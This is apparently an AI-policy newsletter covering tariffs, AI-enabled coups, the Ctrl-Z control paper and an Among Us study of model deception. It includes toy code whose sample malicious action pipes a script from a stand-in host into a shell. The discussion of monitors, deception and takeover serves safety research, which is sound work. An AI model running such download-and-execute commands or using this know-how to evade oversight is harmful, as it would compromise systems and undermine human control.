“Address national security risks and the PRC’s strategy to capture AI market share with low-cost, open-source models by placing a federal procurement prohibition on PRC-origin AI models, including a prohibition on the use of such models on government devices.” As stated this only applies to federal procurement. It seems fine for government devices to steer clear, not because of ‘market share’ concerns (what?) but because of potential security issues, and also because it doesn’t much matter, there is no actual reason to use DeepSeek’s products here anyway.

Their second category is interesting: “Prevent and prepare for strategic surprise related to advanced AI.”

I mean, yes, we should absolutely be doing that, but mostly concerns about that have nothing to do with DeepSeek or the PRC. I mean, I can’t argue with lines like ‘AI will affect many aspects of government functioning, including aspects relating to defense and national security.’

This narrow, myopic and adversarial focus, treating AI purely as a USA vs. PRC situation, misses most of the point, but if it gets our government to actually build state capacity and pay attention to developments in AI, then that’s very good. If they only monitor PRC progress, that’s better than not monitoring anyone’s progress, but we should be monitoring our own progress too, and everyone else’s.

The ‘AI strategic surprise’ to worry about most is, of course, a future highly capable AI (or the lab that created it) strategically surprising you.

Similarly, yes, please incorporate AI into your ‘educational planning’ and look for national security related AI challenges, including those that emerge from US-PRC AI competition. But notice that a lot of the danger is that the competition pushes capabilities or their deployment forward recklessly.

Otherwise, we end up responding to this by pushing forward ever harder and faster and more recklessly, without ability to align or control the AIs we are creating that are already increasingly acting misaligned (I’ll discuss this more when I deal with o3), exacerbating the biggest risks.

We are going about tariffs exactly backwards. This is threatening to cripple our AI efforts along with everything else. So here we are once again.

Mostly tariffs are terrible and one should almost never use them, but to the extent there is a point, it would be to shift production of high-value goods, and goods vital to national security, away from China and towards America and our allies.

That would mean putting a tariff on the high-value finished products you want to produce. And it means not putting a tariff on the raw materials used to make those products, or on products that have low value, aren’t important to national security and that you don’t want to reshore, like cheap clothes and toys.

And most importantly, it means stability. To invest you need to know what to expect.

Mark Gurman: BREAKING: President Donald Trump’s administration exempted smartphones, computers and other electronics from its so-called reciprocal tariffs in win for Apple (and shoppers). This lowers the China tariff from 125%.

Ryan Peterson: So we’re exempting all advanced electronics from Chinese tariffs and putting a 125 pct tariff on textiles and toys?



Armand Domalewski: right now, if I import the parts to make a computer, I pay a massive tariff, but if I import the fully assembled computer, I get no tariff. truly a genius plan to reshore manufacturing

Nassim Nicholas Taleb: Pathological incoherence of Neronulus Trump:

+U.S. made electronics pay duties on imported material/parts. But imports of electronics THAT INCLUDE SAME MATERIAL & PARTS are exempt; this is a CHINA SUBSIDY.

+Moving US industry from high value added into socks, lettuce…

Mike Bird: If you were running a secret strategy to undermine American manufacturing, exempting popular finished consumer goods from tariffs and keeping them in place for intermediate goods, capital goods and raw materials would be a good way to go about it.

Spencer Hakimian: So let’s just get this crystal clear.

If somebody is trying to manufacture a laptop in the U.S., the components that they import are going to be tariffed at 145%.

But if somebody simply makes the laptop entirely in China, they are fully tariff free?

And this is all to bring manufacturing back to the U.S.?

NY-JOKER:

Joey Politano (and this wasn’t what made him the joker, that was a different thread): lol Commerce posted today that they’re looking into tariffs on the machinery used to make semiconductors

This will just make it harder to make semiconductors in the US. It is so unbelievably stupid that I cannot put it into words.

The exact example the administration used of something they (very incorrectly) insisted we could ‘make in America’ was the iPhone. We can’t do that ourselves at any sane price any time soon, but it is not so crazy to say perhaps we should not depend on China for 87% of our iPhones. In response to massive tariffs, Apple was planning to shift more production from China to India.

But then they got an exemption, so forget all that, at least for right now?

Aaron Blake: Lutnick 5 days ago said smartphone manufacturing was coming to the U.S. because of tariffs.

Now we learn smartphones are excluded from the tariffs.

Stephen Miller clarifies in response, and Trump clarified as only he can, that no, such products are (for now, who knows what tomorrow will bring?) still subject to the original IEEPA tariff on China of 20%. That is still a lot less than 145%. What exactly does Miller think is going to happen?

Or maybe not? The methodology for all this, we are told, is ‘on instinct.’

The Kobeissi Letter: BREAKING: Commerce Secretary Lutnick says tariffs on semiconductors and electronics will come in “a month or so.”

Once again, markets are very confused this morning.

It appears that semiconductor tariffs are still coming but not technically a part of reciprocal tariffs.

They will be in their own class, per Lutnick.

De Itaone: White House official: Trump will issue a Section 232 study on semiconductors soon.

White House official: Trump has stated that autos, steel, pharmaceuticals, chips, and other specific materials will be included in specific tariffs to ensure tariffs are applied fairly and effectively.

Ryan Peterson: Tariffs on semiconductors and electronics will be introduced in about a month, according to U.S. Commerce Secretary Lutnick.

Those products were exempted from tariffs just yesterday. The whole system seems designed to create paralysis.

Josh Wingrove: Trump, speaking to us on Air Force One tonight, repeated that the semiconductor tariffs are coming but opened the door to exclusions.

“We’ll be discussing it, but we’ll also talk to companies,” he said. “You have to show a certain flexibility. Nobody should be so rigid.”

Joey Politano: I AM NOW THE JOKER.

You can imagine how those discussions are going to go. How they will work.

So what the hell are you supposed to do now until and unless you get your sit down?

Sit and wait, presumably.

Between the uncertainty about future tariffs and exemptions, including on component parts, who would invest in American manufacturing or other production right now, in AI and tech or elsewhere? At best you are in a holding pattern.

Stargate is now considering making some of its data center investments in the UK.

Indeed, trade is vanishing stunningly fast.

That is only through April 8. I can’t imagine it’s gotten better since then. I have no idea what happens when we start actually running out of all the things.

We are setting ourselves up on a path where our own production will actively fall since no one is able to plan, and we will be unable to import what we need. This combination is setting us up for rather big trouble across the board.

Ryan Peterson: Met another US manufacturer who’s decided to produce their product overseas where they won’t have to pay duties on component imports.

Paul Graham: Someone in the pharma business told me companies are freezing hiring and new projects because of uncertainty about tariffs. I don’t think Trump grasps how damaging mere uncertainty is.

…

Even if he repealed all the tariffs tomorrow, businesses would still have to worry about what he might do next, and be correspondingly conservative about plans for future expansion.

Kelsey Piper: the only thing that will actually prompt a full recovery is Congress reasserting its power over taxation so the markets can actually be sure we won’t do this song and dance again in a few months.

The trading of Apple and its options around the exemption announcement was, shall we say, worthy of the attention of the SEC. It’s rather obvious what this looks like.

If you took the currently written rules at face value, what would happen to AI? Semianalysis projected on April 10 that the direct cost increase for GPU cloud operators was at that point likely less than 2%, cheap enough to shrug off, but that wafer fabrication equipment costs for US labs would rise 15% and optical module costs would increase 25%-40%.

Semianalysis (Dylan Patel et al): Nevertheless, we identified a significant loophole in the current tariff structure – explained in detail in the following section – that allows US companies to avoid tariffs on certain goods, including GPUs, imported from Mexico and Canada.

While GPUs are subject to a 32% tariff on all GPUs exported from Taiwan to the US, there is a loophole in the current tariff structure that allows US companies to import GPUs from Mexico and Canada at a 0% tariff.

That would mean the primary impact here would be on the cost and availability of financing, and the decline in anticipated demand. But by the time you read this, that report and Peter’s summary of it will be at least days old. You need to double check.

You also need to hold onto your talent. The world’s top talent, at least until recently, wanted to beat a path to our door. We are so foolish that we often said no. And now, that talent, including those we said yes to, are having second thoughts.

Shin Megami Boson: I run an AI startup and some of my best employees are planning to leave the country because, while they’re on greencards and have lived here for over a decade, they’re not willing to risk getting disappeared to an el salvadorean blacksite if they try to visit family abroad.

My current guess on the best place to go, if one had to go, would be Canada. I can verify that I indeed know someone (in AI) who really did end up moving there.

Meanwhile, this sums up how it’s going:

Ryan Peterson: Two of our American customers devastated by the tariffs gave up and sold themselves to their Chinese factories in the last week.

Thousands, and then millions, of American small businesses, including many iconic brands, we’ll go bankrupt this year if the tariff policies on China don’t change.

These small businesses are largely unable to move their manufacturing out of China. They are last in line when they try to go to a new country as those other countries can’t even keep up with the demand from mega corporations.

The manufacturers in Vietnam and elsewhere can’t be bothered with small batch production jobs typical of a small business’s supply chain.

When the brands fail, they will be purchased out of bankruptcy by their Chinese factories who thus far have built everything except a customer facing brand, which is where most of the value capture happens already.

Consumer goods companies typically mark up the goods 3x or more to support their fixed costs (including millions of American employees).

Now the factories will get to vertically integrate and capture the one part of the chain they haven’t yet dominated.

…

And when they die, it may actually be the final victory for the Chinese manufacturer as they scoop up brands that took decades to build through the blood, sweat and tears of some of the most creative and entrepreneurial people in the world. American brand builders are second to none world wide.

Dean Ball joins the White House Office of Science and Technology Policy as a Senior Policy Advisor on AI and Emerging Technology. This is great news and also a great sign, congrats to him and also those who hired him. We have certainly had our disagreements, but he is a fantastic pick and very much earned it.

Director Michael Kratsios: Dean [Ball] is a true patriot and one of the sharpest minds in AI and tech policy.

I’m proud to have him join our @WHOSTP47 team.

The Stop Stealing Our Chips Act, introduced by Senator Rounds and Senator Warner, would help enable BIS, whose capabilities are being crippled by forced firings, to enforce our regulations on exporting chips, including whistleblower procedures and creating associated protections and rewards. I agree this is a no-brainer. BIS desperately needs our help.

Corin Katzke and Gideon Futerman make the latest attempt to explain why racing to artificial superintelligence would undermine America’s national security, since ‘why it would kill everyone’ is not considered a valid argument by so many people. They warn of great power conflict when the PRC reacts, the risk of loss of control and the risk of concentration of power.

They end by arguing that ASI projects are relatively easy to monitor reasonably well, and the consequences severe, thus cooperation to avoid developing ASI is feasible.

I checked out the other initial AI Frontiers posts as well. They read as reasonable explainers for people who know little about AI, if there is need for that.

Where we are regarding AI takeover and potential human disempowerment…

Paul Graham: Sam, if all these politicians are going to start using ChatGPT to generate their policies, you’d better focus on making it generate better policies. Or we could focus on electing better politicians. But I doubt we can improve the hardware as fast as you can improve the software.

Demis Hassabis talks to Reid Hoffman and Aria Finger, which sounds great on principle but the description screams failure to know how to extract any Alpha.

Yann LeCun says he’s not interested in LLMs anymore, which may have something to do with Meta’s utter failure to produce an interesting LLM with Llama 4?

Austin Lin: the feeling is mutual.

As usual, our media has a normal one and tells us what we need to know.

Brendan Steinhauser: My friend and colleague @MarkBeall appeared on @OANN to discuss AI and national security.

Check it out. #ai

Yes, they do indeed try to ask him about our vulnerability to the spying Chinese robot dogs. Mark Beall does an excellent job pivoting to powerful AI and the race to superintelligence, the risks of AI cyberattacks and how far behind the curve is our government’s situational awareness. Then Chanel asks better questions, including about the (very crucial) need for more rapid military adaptation cycles. When Beall says America and China are ‘neck and neck’ here he’s talking about military adaptation, where we are moving painfully slowly.

Why does unsupervised learning work? The answer given is compression, finding the shortest program that explains the data, including representing randomness. The explanation says that’s what pretraining does, and it learns very quickly. I notice I do not find this satisfying, it doesn’t satiate my confusion or curiosity here. Nor do I buy that it is explaining that large a percentage of what is going on to say ‘intelligence is efficient compression.’ I see a similar perspective here from Dean Ball, where he notes that more intelligent people can detect patterns before a dumber person. That’s true, but I believe that other things can enable this that aren’t (to me) intelligence, and that there are things that are intelligence but that don’t do this, and also that it’s largely about threshold effects rather than speed.
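To make the ‘shortest program that explains the data’ framing concrete, here is a minimal sketch that uses zlib’s compressed size as a crude stand-in for description length. That substitution is my assumption for illustration. It is not what pretraining does, and it is not taken from the explanation being discussed.

```python
import random
import zlib


def compressed_size(data: bytes) -> int:
    """Bytes zlib needs at its highest level, a rough proxy for description length."""
    return len(zlib.compress(data, 9))


n = 10_000
rng = random.Random(0)  # fixed seed so the run is repeatable

# Highly regular data: a short "program" (repeat this phrase) explains it.
patterned = (b"the cat sat on the mat. " * (n // 24 + 1))[:n]

# Pseudo-random bytes: no regularity that zlib is able to find.
noisy = bytes(rng.randrange(256) for _ in range(n))

patterned_size = compressed_size(patterned)
noisy_size = compressed_size(noisy)

print(f"patterned: {n} -> {patterned_size} bytes")
print(f"noisy:     {n} -> {noisy_size} bytes")
```

The patterned input shrinks to a small fraction of its size while the noisy input barely shrinks at all. Note the catch, which fits my unease with the framing: the ‘noisy’ bytes actually do have a very short description (a seed plus a generator), and zlib simply is not smart enough to find it.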

Conjecture Co-Founder Gabe Alfour on The Human Podcast.

It seems there is a humorous AI Jesus podcast.

Peter Wildeford offers a 1-minute recap of the GPT-4.5 livestream, that one minute of attention is all you need. GPT-4.5 is 10x more compute than GPT-4, the process took two years, data availability is a pain point, the next step is another 10x increase to 1M GPU runs over 1-2 years.

Dylan Patel: OpenAI successfully wasted an hour of time for every person in pre-training by making them pay the upmost attention for insane possible alpha, but subsequently having none.

I hate the OpenAI livestreams. They’re almost never worthwhile, and I’ve stopped watching, but I have to worry I am missing something and I have to wait for the news to arrive later in text form. Please send text tokens for greater training efficiency.

Tom Davidson spends three hours out of the 80,000 Hours (podcast) talking about AI-enabled coups.

A new paper also looks at these various mechanisms of AI-enabled coups. This is still framed here as worry about a person or persons taking over rather than worry about the AI itself taking over. In the coup business it’s all the same except that the AI is a lot smarter and more capable.

-

The first concern is if AI is singularly loyal. Note that this loyalty functions the same whether or not it is nominally to a particular person. Any mechanism of singular control will do.

-

The second concern is ‘hard-to-detect secret loyalties,’ which in a broad sense are inevitable and ubiquitous under current techniques. The AI might not be secretly loyal ‘to a person’ but its loyalties are not what you had in mind. One still does want to prevent this from being done more explicitly or deliberately, to focus loyalty to particular persons or groups. Note that it won’t be ‘clean’ to get an AI to refuse such modifications: what other modifications will it learn to refuse?

-

The third concern is ‘exclusive access to coup-enabling capabilities,’ so essentially just a controllable group becoming relatively highly capable, thus granting it the ability to steer the future.

The core problem isn’t preventing a ‘coup,’ as in allowing a small group to steer the future. That alone seems doable. The problem is, you need to prevent this, but you also need humanity to still collectively be able to meaningfully steer a future that contains entities smarter than humans, at the same time, while also protecting against various forms of gradual disempowerment and the vulnerable world hypothesis. That is very hard, the final boss version of the classic problems of governance we’ve been dealing with for a very long time, to which we’ve only found least horrendous answers.

Last week I mentioned that OpenAI was attempting to transition their non-profit arm into essentially ‘do ordinary non-profit things.’ Former OpenAI employee Jacob Hilton points out I was being too generous, and that the new mission would better be interpreted as ‘proliferate OpenAI’s products among nonprofits.’ Clever, that way even the money you do pay the nonprofit you largely get to steal back, too.

Michael Nielsen in a very strong essay argues that the ‘fundamental danger’ from ASI isn’t ‘rogue ASI’ but rather that ASI enables dangerous technologies, while also later in the essay dealing with other (third) angles of ASI danger. He endorses and focuses on the Vulnerable World Hypothesis. By aligning models we bring the misuse threats closer, so maybe reconsider alignment as a goal. This is very much a ‘why not both’ situation, or as Google puts it, why not all four: Misalignment, misuse, mistakes and multi-agent structural risks like gradual disempowerment. This isn’t a competition.

One place where Nielsen is very right is that alignment is insufficient, however I must remind everyone that it is necessary. We have a problem where many people equate (in both good faith and bad faith) existential risk from AI uniquely with a ‘rogue AI,’ then dismiss a ‘rogue AI’ as absurd and therefore think creating smarter than human, more capable minds is a safe thing for humans to do. That’s definitely a big issue, but that doesn’t mean misalignment isn’t a big deal. If you don’t align the ASIs, you lose, whether that looks like ‘going rogue’ or not.

Another important point is that deep understanding of the world is everywhere and always dual use, as is intelligence in general, and that most techniques that make models more ‘safe’ also can be repurposed to make models more useful, including in ‘unsafe’ ways, and one does not simply take a scalpel to the parts of understanding that you dislike.

He ends with a quick and very good discussion of the risk of loss of control, reiterating why many dumb arguments against it (like ‘we can turn it off’ or ‘we won’t give it goals or have it seek power’ or ‘we wouldn’t put it in charge’) are indeed dumb.

A thread with some of the most famous examples of people Speaking Directly Into the Microphone, as in advocating directly for human extinction.

A good reminder that when people make science fiction they mostly find the need to focus on the negative aspects of things, and how they make humans suffer.

Mark Krestschmann: Forget “Black Mirror”. We need WHITE MIRROR An optimistic sci-fi show about cool technology and how it relates to society. Who’s making this?

Rafael Ruiz: People are saying this would be boring and not worth watching, yet 90% of people are irrationally afraid of technology because of Black Mirror-esque sci-fi.

The “fiction to bad epistemics” pipeline remains undefeated.

We need to put up more positive visions for the future.

Andrew Rettek: Star Trek wasn’t boring.

If there’s one thing we have definitely established, it’s that most AI companies have essentially zero interest in any actions that don’t directly impact the bottom line.

Joshua Clymer: favorite line (from the 80k hours podcast with Buck):

“5 years ago I thought addressing misalignment was very difficult. Now the situation feels like man we know a list of 40 things, none of which feel that hard, but i’ve also updated drastically downward on how many things AI companies have the time / appetite to do”

My position is that addressing misalignment still looks extremely difficult, indeed many of the required elements feel very hard, and also navigating the narrow path to a worthy future will be extremely difficult even if alignment does get solved.

Alas, I fully endorse the second half of Buck’s statement. The AI companies are dramatically underinvesting in alignment, security and safety work, even relative to their own private economic self-interest via the resulting more useful models.

John Wentworth asks, what would it look like if everything AI was kind of fake? I agree that this is something to keep an eye on, but not to endorse.

A hotfix to the OpenAI model spec, great work everyone, and we have a changelog.

Jason Wolfe: We just released a small bugfix update to the OpenAI Model Spec. Key changes:

– Fixed a copy-editing error where “misalignment” wasn’t listed as a reason assistants might pursue incorrect goals.

– Clarified that “Do not lie” allows “pleasantries” rather than “white lies.”

Since they thanked me explicitly for pointing some of this out: You’re welcome. And thank you for fixing it.

Daniel Kokotajlo remains worried that the models can still lie to avoid revealing privileged information. It’s obviously fine to refuse to answer questions, but once the models start lying for glomarization it’s not clear where that ends.

Buck Shlegeris et al offer a new paper testing methods for AI control with a red teamer attempting to get a coding agent to download malware. The solution is called ‘Ctrl-Z: Controlling AI Agents via Resampling,’ as in once suspicion is aroused you can ‘go back in time’ and resample earlier actions (note that this implies you can isolate all the relevant preconditions for the action, which I expect to often break as an assumption).

We measure the tradeoff between attack prevention and usefulness; our best protocol combines resampling with analysis of previous steps, reducing the success rate of attacks from 58% to 7% at a 5% cost to the performance of a non-malicious agent.

I see what they did there, but the limitations seem too large for me to update much.
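To make the resampling idea concrete, here is a minimal toy sketch in Python. This is not the paper's protocol. The `propose` and `suspicion` functions, the threshold and the resample budget are all hypothetical stand-ins, and it only redraws the current action rather than rewinding earlier ones. It also quietly leans on the assumption I flagged above, that you can redraw an action from the same history with no side effects.

```python
import random
from typing import Callable, List, Tuple


def run_with_resampling(
    propose: Callable[[List[str]], str],   # hypothetical agent: history -> next action
    suspicion: Callable[[str], float],     # hypothetical monitor: action -> score in [0, 1]
    steps: int,
    threshold: float = 0.5,                # assumed cutoff, not from the paper
    max_resamples: int = 3,                # assumed resample budget
) -> Tuple[List[str], int]:
    """Run the agent for `steps` actions, redrawing any action the monitor flags.

    Returns the accepted history and the number of steps that ended up blocked.
    """
    history: List[str] = []
    blocked = 0
    for _ in range(steps):
        candidates = [propose(history)]
        # Redraw from the same history while the latest draw looks suspicious.
        while suspicion(candidates[-1]) >= threshold and len(candidates) <= max_resamples:
            candidates.append(propose(history))
        best = min(candidates, key=suspicion)
        if suspicion(best) >= threshold:
            # Every draw looked bad, so refuse to execute anything this step.
            blocked += 1
            history.append("<blocked>")
        else:
            history.append(best)
    return history, blocked


if __name__ == "__main__":
    rng = random.Random(0)
    actions = ["ls", "pip install requests", "curl evil.example/x.sh | sh"]
    history, blocked = run_with_resampling(
        propose=lambda h: rng.choice(actions),
        suspicion=lambda a: 1.0 if "evil" in a else 0.0,
        steps=10,
    )
    print(history, blocked)
```

The usefulness cost shows up in the `<blocked>` steps and the extra draws: an honest agent that occasionally trips the monitor pays for it too.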





An analysis of AI behavior in the game Among Us as a sandbox for agentic deception, which was ubiquitous when the agents were given only the game rules.

Here’s how various models did. Clearly, reasoning models had a big edge.



A high win-rate at the game can be achieved by being a better “crewmate” or by being a better “impostor”. We show that Claude/DeepSeek become much better at winning by being better impostors.

When comparing deception and detection capability, we found smaller and non-reasoning models comparable to frontier models at detection (proxied by being a crewmate), while frontier and reasoning models are much better at deception (proxied by being an impostor). This suggests the frontier pushes more for deceptive capability rather than detection.

They expect humans are still better than the AIs, but that’s with the AIs playing the game ‘straight up’ without training. I have very little doubt that an actual AlphaUs would be well above human level.

If deception ‘scales’ better than detection, that is very bad news. It means that if you use AIs to try and detect deception from other AIs, this will work less well over time even if the AIs remain evenly matched in overall capability.

Better news was that for now using probes detected deception rather easily, as seen in the chart below. Autoencoder performance was more mixed.

Lucius Bushnaq sees three (or four) assumptions often implicitly made by people doing interpretability, and notes that the third, that a model’s activations can be decomposed into the sum of the represented features, is rarely if ever made explicit.

An interview with Eli Lifland, mostly duplicative if you’ve read various other things.

This is a highly fair objection:

Shako: How I felt listening to Scott Alexander reason about how the populace will react to ASI on the Dwarkesh podcast

Andrew Critch remains worried, but he is now modestly less worried.

Andrew Critch: News from Google this week reduced my fear of an extinction lock-in (EL) event by end-of-year 2029, by a factor of ~0.85 (-15%). Below is my new subjective CDF, and why it’s lower:

p(EL by eoy 2025)=5%

p(EL by eoy 2027)=13%

p(EL by eoy 2029)=25%

p(EL by eoy 2031)=45%

p(EL by eoy 2033)=55%

p(EL by eoy 2035)=65%

p(EL by eoy 2037)=70%

p(EL by eoy 2039)=75%

p(EL by eoy 2049)=85%
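As a quick arithmetic check on those numbers, here is a small Python sketch that turns the CDF into the probability mass landing in each interval, and backs out what the 2029 figure would have been before the update. The second part assumes the "factor of ~0.85" applies multiplicatively to the 2029 number, which is my reading of the post rather than something Critch spells out.

```python
from typing import Dict

# Critch's stated cumulative probabilities of an extinction lock-in (EL) by end of year.
cdf: Dict[int, float] = {
    2025: 0.05, 2027: 0.13, 2029: 0.25, 2031: 0.45, 2033: 0.55,
    2035: 0.65, 2037: 0.70, 2039: 0.75, 2049: 0.85,
}


def interval_masses(cdf: Dict[int, float]) -> Dict[int, float]:
    """Probability that EL first happens in the interval ending at each listed year."""
    masses: Dict[int, float] = {}
    prev = 0.0
    for year in sorted(cdf):
        masses[year] = round(cdf[year] - prev, 4)
        prev = cdf[year]
    return masses


def implied_prior(posterior: float, factor: float) -> float:
    """Pre-update value, assuming posterior = prior * factor."""
    return posterior / factor


if __name__ == "__main__":
    masses = interval_masses(cdf)
    print(masses)
    print(max(masses, key=masses.get))              # interval with the most mass
    print(round(implied_prior(cdf[2029], 0.85), 3))  # roughly 0.294
```

On this reading, the 2029 number moved from roughly 29% to 25%, and the single scariest window is 2030 to 2031, which carries 20 points of probability on its own.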

That’s still an 85% chance of extinction lock-in within 25 years. Not great. But every little bit helps, as they say. What was the cause for this update?

Andrew Critch: The main news is Google’s release of an Agent to Agent (A2A) protocol.

Alvaro Cintas: Google introduces Agent2Agent (A2A) protocol for AI interoperability.

It enables AI agents from different vendors to communicate and collaborate seamlessly.

Google: Today, we’re launching a new, open protocol called Agent2Agent (A2A), with support and contributions from more than 50 technology partners like Atlassian, Box, Cohere, Intuit, Langchain, MongoDB, PayPal, Salesforce, SAP, ServiceNow, UKG and Workday; and leading service providers including Accenture, BCG, Capgemini, Cognizant, Deloitte, HCLTech, Infosys, KPMG, McKinsey, PwC, TCS, and Wipro. The A2A protocol will allow AI agents to communicate with each other, securely exchange information, and coordinate actions on top of various enterprise platforms or applications.

…

A2A facilitates communication between a “client” agent and a “remote” agent. A client agent is responsible for formulating and communicating tasks, while the remote agent is responsible for acting on those tasks in an attempt to provide the correct information or take the correct action.

Andrew Critch: First, I wasn’t expecting a broadly promoted A2A protocol until the end of this year, not because it would be hard to make, but because I thought business leaders in AI weren’t thinking enough about how much A2A interaction will dominate the economy soon.

Second, I was expecting a startup like Cursor to have to lead the charge on promoting A2A. Google doing this is heartening — and something I’ve been hoping for — because more than any other company, they “keep the internet running”, and they *should* lead on this.

I’d lower my risk estimates further, except that I don’t *yet* see how the US and China are going to sort out their relations around AI. But FWIW, I’ve been hoping for years that trade negotiations like tariffs would be America’s primary approach to that.

Anyway, seeing leadership from big business on agent-to-agent interaction protocols in Q2 2025 is yielding a significant (*0.85) shift downward in my worries.

Thanks Google!

This A2A feature certainly seems cool and useful, and yes it seems positive for Google to be the one providing the protocol. It will be great if your agent can securely call other agents and relay its subtasks, rather than each agent having to navigate all those subtasks on its own. You can call agents to do various things the way traditional programs can call functions. Great job Google, assuming this is good design. From what I could tell it looked like good design but I’m not going to invest the kind of time that would let me confidently judge that.
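For intuition on the "call agents the way programs call functions" framing, here is a toy in-process sketch in Python of the client agent and remote agent roles from Google's description. To be clear, this is not the A2A protocol or its wire format. Every class, field and method name here (`Task`, `Result`, `RemoteAgent`, `ClientAgent`, `delegate`) is hypothetical, and the real thing involves network transport, authentication and discovery that this ignores.

```python
from dataclasses import dataclass
from typing import Callable, Dict, List


@dataclass
class Task:
    skill: str    # what the client wants done (hypothetical field)
    payload: str  # the input for that skill (hypothetical field)


@dataclass
class Result:
    ok: bool
    output: str


class RemoteAgent:
    """Acts on tasks it has a skill for."""

    def __init__(self, name: str, skills: Dict[str, Callable[[str], str]]):
        self.name = name
        self.skills = skills

    def handle(self, task: Task) -> Result:
        handler = self.skills.get(task.skill)
        if handler is None:
            return Result(False, f"{self.name} cannot do {task.skill}")
        return Result(True, handler(task.payload))


class ClientAgent:
    """Formulates tasks and hands each one to a remote agent that can act on it."""

    def __init__(self, remotes: List[RemoteAgent]):
        self.remotes = remotes

    def delegate(self, task: Task) -> Result:
        # Pick the first remote agent that advertises the requested skill.
        for remote in self.remotes:
            if task.skill in remote.skills:
                return remote.handle(task)
        return Result(False, f"no agent offers {task.skill}")


if __name__ == "__main__":
    calendar = RemoteAgent("calendar", {"book": lambda when: f"booked {when}"})
    client = ClientAgent([calendar])
    print(client.delegate(Task("book", "Tuesday 3pm")).output)
```

The point of a shared protocol is that the `delegate` step works across vendors, so the client never needs to know how the remote agent does its job.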

What I don’t see is why this substantially improves humanity’s chances to survive.

The right mind for this job does not yet exist.

But it calls for my new favorite motivational poster.

Arthur Dent (if that is his real name, and maybe it is?): I asked the AI for the least inspiring inspirational poster and I weirdly like it

Here’s an alternative AI-generated motivational poster.

AI Safety Memes: ChatGPT, create a metaphor about AI then turn it into an image.

The work is mysterious and important.

Yes. They’re scary. The numbers are scary.

Michi: My workplace held an AI-generated image contest and I submitted an illustration I drew. Nobody noticed it wasn’t AI and I ended up winning.